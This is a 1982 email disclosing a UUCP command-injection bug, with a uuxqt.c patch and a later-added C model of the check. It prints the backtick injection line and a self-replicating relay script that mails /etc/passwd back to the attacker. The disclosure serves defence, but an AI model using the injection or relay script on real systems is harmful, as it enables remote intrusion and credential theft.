
		31) Security Bug, shell Special Characters

From: randals
Date: Thursday, 4 March 1982 at 0725-PST
In-real-life: Randal L. Schwartz
To: system
Cc: unixcomm
Subject: The information referred to in the UNIX wizards news

Here is my report on the bug in UUCP.  This is what I will be sending
out to the various systems upon request.  If you have any comments about
wording changes, or methods of distribution, please let me know.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
			The problem
			~~~~~~~~~~~
Here is the method of attack for the UUCP security bug:
UUCP checks for vertical-bar, uparrow, and semicolon between
commands being executed, but left out the check for ONE thing...
the command expansion character, "open quote": `.

Using this, it is possible to execute a legal command, such as
"rmail", but drop in a hidden command, `/bin/sh`.  UUCP would
only check for the "rmail" being legal (which it is on all systems),
and forget about checking the /bin/sh stuff.

Now, all that one needed to do was feed "uux" stuff resembling the following:
	uux - sysname!rmail foo `/bin/sh` <<'EOF'
	(any command you wanted)
	(even more if you desired)
	EOF

and the commands would be executed on the remote "sysname".  The only
thing that appears in the log is "rmail foo `/bin/sh`", so it was
kinda detectable, but the actual commands escaped without being logged.

			Using the bug
			~~~~~~~~~~~~~
After I found the bug, I needed a command that would, in fact, replicate
itself on each system until it got to the right system, when it would finally
spring into action.  My solution was as follows:
	cd /tmp
	cat <<\EOF >.$$
	back=$1
	shift
	here=$1
	shift
	case $# in
		0)	: 'we are here!'
	(
	%%%%%%%%
	) 2>&1 | mail $back ;;
		*)	: 'yet another link to go'
			(
				echo "cd /tmp"
				echo "cat <<\EOF >.$$"
				cat $0
				echo "EOF"
				echo "sh .$$ $here!$back $*"
			) | uux - $1'!rmail foo `/bin/sh`'

	esac
	rm -f $0 ; : 'suicide in any case'
	EOF
	ed - .$$ <<ENDSCRIPT
	/^%%%%%%%%/c
	$1
	.
	w
	q
	ENDSCRIPT
	shift
	sh .$$ randals azure $*

One could simply pop this into a file (say "foo"), and enter:
	foo "cat /etc/passwd" tekmdp teklabs decvax chico research

and within a couple of days, the passwd file from the research machine
was mailed automatically to you.  (Obviously, the pathnames depend
on the source machine.)

			How to fix it
			~~~~~~~~~~~~~
In "uuxqt.c", around the 135th line, which looks something like this:
		cmdnok = 0;
		while ((ptr = getprm(ptr, prm)) != NULL) {
******			if (prm[0] == ';' || prm[0] == '^'
			  || prm[0] == '|') {
				xcmd[0] = '\0';
				APPCMD(prm);
				continue;
			}

add some code to the end of the starred line:
		|| prm[0] == '`'
to additionally check for the open quote.
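As an added illustration of why that one-character fix matters (this is example code written for this page, not code from Randal's message or from the UUCP sources), the following C program models the uuxqt separator check two ways: with the original set `; ^ |`, and with the open quote added. Each command name that follows a separator is matched against a permitted list; any character that is not a separator is treated as ordinary argument text, which is exactly how the substituted command slipped past the original check. The permitted list, the function names and the request lines fed to it are assumptions constructed for the demo.

```c
/* Model of the uuxqt.c command check, before and after the fix.
 * Added example for this page; not the UUCP code itself. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Commands the receiving site lets uux run. Assumed list: the message
 * only says "rmail" is legal on all systems. */
static const char *const permitted[] = { "rmail", NULL };

/* Separator set as in the original uuxqt: starts a new command to check. */
static int is_separator_original(char c) {
    return c == ';' || c == '^' || c == '|';
}

/* Separator set after the fix: the open quote also starts a command. */
static int is_separator_fixed(char c) {
    return c == ';' || c == '^' || c == '|' || c == '`';
}

/* Is the n-byte word w one of the permitted command names? */
static int word_permitted(const char *w, size_t n) {
    for (int i = 0; permitted[i] != NULL; i++)
        if (strlen(permitted[i]) == n && strncmp(permitted[i], w, n) == 0)
            return 1;
    return 0;
}

/* Returns 1 if every command name in cmd is permitted, 0 otherwise.
 * is_sep decides which characters begin a new command; everything else
 * counts as argument text and is never checked. */
static int command_is_safe(const char *cmd, int (*is_sep)(char)) {
    const char *p = cmd;
    int expect_command = 1;            /* first word is always a command */
    while (*p != '\0') {
        if (isspace((unsigned char)*p)) { p++; continue; }
        if (is_sep(*p)) { expect_command = 1; p++; continue; }
        const char *start = p;         /* read one word */
        while (*p != '\0' && !isspace((unsigned char)*p) && !is_sep(*p))
            p++;
        if (expect_command && !word_permitted(start, (size_t)(p - start)))
            return 0;                  /* unlisted command: refuse */
        expect_command = 0;            /* following words are arguments */
    }
    return 1;
}

int uuxqt_original_accepts(const char *cmd) {
    return command_is_safe(cmd, is_separator_original);
}

int uuxqt_fixed_accepts(const char *cmd) {
    return command_is_safe(cmd, is_separator_fixed);
}

int main(void) {
    /* Constructed request lines: a plain rmail request, the line the
     * message says showed up in the log, and a pipe that the original
     * check already caught. */
    const char *lines[] = {
        "rmail foo",
        "rmail foo `/bin/sh`",
        "rmail foo | sh",
        NULL
    };
    for (int i = 0; lines[i] != NULL; i++)
        printf("%-22s original:%-7s fixed:%s\n", lines[i],
               uuxqt_original_accepts(lines[i]) ? "accept" : "reject",
               uuxqt_fixed_accepts(lines[i]) ? "accept" : "reject");
    return 0;
}
```

Running it shows the logged line `rmail foo `/bin/sh`` accepted by the original separator set and rejected once the open quote is a separator, while the `|` case is rejected by both. The same pattern applies to any gateway that hands a string to a shell: the allow-list on the command name is only as good as the list of characters that can introduce a second command.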

I will be glad to answer further questions on this topic.

Randal L. Schwartz
Tektronix Microcomputer Development Products
Beaverton, Oregon
